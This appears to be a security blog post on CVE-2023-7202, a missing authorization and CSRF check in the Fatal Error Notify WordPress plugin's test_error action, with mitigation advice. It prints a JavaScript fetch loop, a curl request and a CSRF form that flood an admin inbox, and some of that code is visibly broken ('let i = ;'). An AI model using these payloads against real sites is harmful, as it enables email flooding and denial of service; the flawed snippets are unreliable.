CVE-2023-7202 - How a Simple Flaw Let WordPress Users Spam Admin Emails via Fatal Error Notify Plugin

The WordPress ecosystem is enormous and, unfortunately, so is the attack surface. In December 2023, a critical vulnerability surfaced in the widely-used Fatal Error Notify plugin—tracked as CVE-2023-7202—and it allowed even low-level users to spam the admin email with fake error messages. Even worse, attackers could automate this tactic with a bit of clever web trickery known as CSRF. In this post, I’ll break down what happened, how the exploit works, and how you can protect yourself.

Quick Summary

Vulnerability: No authorization or CSRF checks for a sensitive AJAX action
Affected Versions: Fatal Error Notify before 1.5.3
Risk: Authenticated users (even Subscribers) and attackers via CSRF can spam admin emails
Patched in: v1.5.3
CVE: CVE-2023-7202

How Does the Vulnerability Work?

The Fatal Error Notify plugin helps WordPress admins by sending them an email when their site triggers a PHP error. But the plugin forgot to put any checks on its test_error AJAX action. That means *any* logged-in user, even the lowliest Subscriber, could make the plugin fire off emails for fun.

What’s even more alarming? There was no CSRF (Cross-Site Request Forgery) protection either, so any website could trick an admin (or another logged-in user) into making these requests just by them visiting a webpage.

Here’s a simplified idea of what the problematic function looked like

add_action( 'wp_ajax_test_error', 'fen_trigger_test_error' );

function fen_trigger_test_error() {
    // No checks for user role or CSRF nonce!
    send_fatal_error_email('This is a test error');
    wp_send_json_success('Email sent!');
}

Exploiting the Vulnerability

Let’s say you’re logged in as a Subscriber on a site running a vulnerable version of Fatal Error Notify. You can easily spam the admin by sending requests to:

POST /wp-admin/admin-ajax.php?action=test_error

If you wanted to trigger endless error emails, open the browser console and paste

for (let i = ; i < 10; i++) {
  fetch('/wp-admin/admin-ajax.php?action=test_error', {credentials: 'include'});
}

Or, for a more classic approach, use curl

curl -b cookies.txt \
     -X POST 'https://victimsite.com/wp-admin/admin-ajax.php'; \
     -d 'action=test_error'

(You’d need to be logged in; export cookies from your browser.)

Exploiting with CSRF: No Login Needed

Here’s where it gets ugly: there’s no CSRF protection. So an attacker could set up a page like this:

<form action="https://victimsite.com/wp-admin/admin-ajax.php"; method="POST" id="csrf-form">
  <input type="hidden" name="action" value="test_error">
</form>
<script>
  for(let i = ; i < 10; i++) {
    document.getElementById('csrf-form').submit();
  }
</script>

If an admin (or any logged-in user) visits this page, *bang*: their browser sends the requests and the admin’s inbox fills up.

Why should you care?

- Denial of Service: Spam enough emails, and the admin mailbox gets unusable or email quotas get depleted.

Mitigation

Plugin Update: The Fatal Error Notify team fixed this in version 1.5.3 by:
- Adding proper authorization checks (see current_user_can())
- Including CSRF protection (check_ajax_referer())

So, update now. If you can’t, consider disabling the plugin until a fix is possible.

References

- CVE-2023-7202 at NVD
- WPScan Advisory
- Plugin Homepage

TL;DR

If you’re running Fatal Error Notify earlier than v1.5.3, anyone with an account—or via CSRF—can spam your admin inbox with fake PHP errors. Update your plugin (or disable it) to stay safe.

Want to learn more about securing WordPress? Drop your questions below or check out the provided references. Stay safe out there!

Timeline

Published on: 02/27/2024 09:15:37 UTC
Last modified on: 10/28/2024 00:35:02 UTC